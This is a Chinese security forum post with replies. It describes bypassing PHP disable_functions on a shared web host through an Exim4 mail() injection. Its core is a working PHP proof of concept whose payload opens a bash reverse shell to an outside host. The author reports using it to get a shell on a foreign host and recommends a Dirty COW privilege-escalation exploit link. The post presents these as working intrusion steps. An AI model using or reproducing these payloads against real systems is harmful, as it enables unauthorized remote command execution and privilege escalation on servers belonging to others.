Linux 下用exim4 bypass php disable_functions

Linux 下用exim4 bypass php disable_functions
发布于 6 天前 作者 iswin 209 次浏览 来自 知识碎片

今天遇到了个国外的虚拟主机,php无法执行命令,搜了下bypass的东西,发现之前wordpress rce里面的mail函数好像可以,测试了下,成功反弹了个shell回来,简单记录下。

<?php
// RCE via mail() vector on Exim4 MTA
// Attacker's cmd is passed on STDIN by mail() within $body
// Discovered by:
// Dawid Golunski - @dawid_golunski - https://legalhackers.com

        $sender = "[email protected] -be";
        $body   = 'Exec: ${run{/bin/bash -c "bash -i >& /dev/tcp/threadhunter.org/80 0>&1"}{yes}{no}}';
        // ^ unfiltered vars, coming from attacker via GET, POST etc.

        $to = "[email protected]";
        $subject = "Exim RCE PoC";
        $headers = "From: [email protected]";

        mail($to,$subject,$body,$headers, "-f $sender ");
?>

参考:https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html

image

追加一个,脏牛那个洞测试了下在2.6.32下面基本上可以比较稳定的利用,这个POC比较好用https://gist.github.com/KrE80r/42f8629577db95782d5e4f609f437a54

image

向 i 神学习。

image

思路很赞啊,不过有些站点exim没安装或者开启

image

@y4ng 看来我是比较幸运了,不是狗爹,应该是小厂商🙂

image

@iswin 国外大厂的对抗还是蛮有意思的 ~

image

楼上都是老司机 我遇到的国外虚机提权好像很多提不下


为您推荐了相关的技术文章:

  1. SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合
  2. 当 PassiveDNS 遇到泛解析 | 岚光
  3. 穷人的虚拟化实验室方案 - ThreatHunter
  4. Browser's XSS Filter Bypass Cheat Sheet · masatokinugawa/filterbypass Wiki · GitHub
  5. 内网渗透测试定位技术总结

原文链接: threathunter.org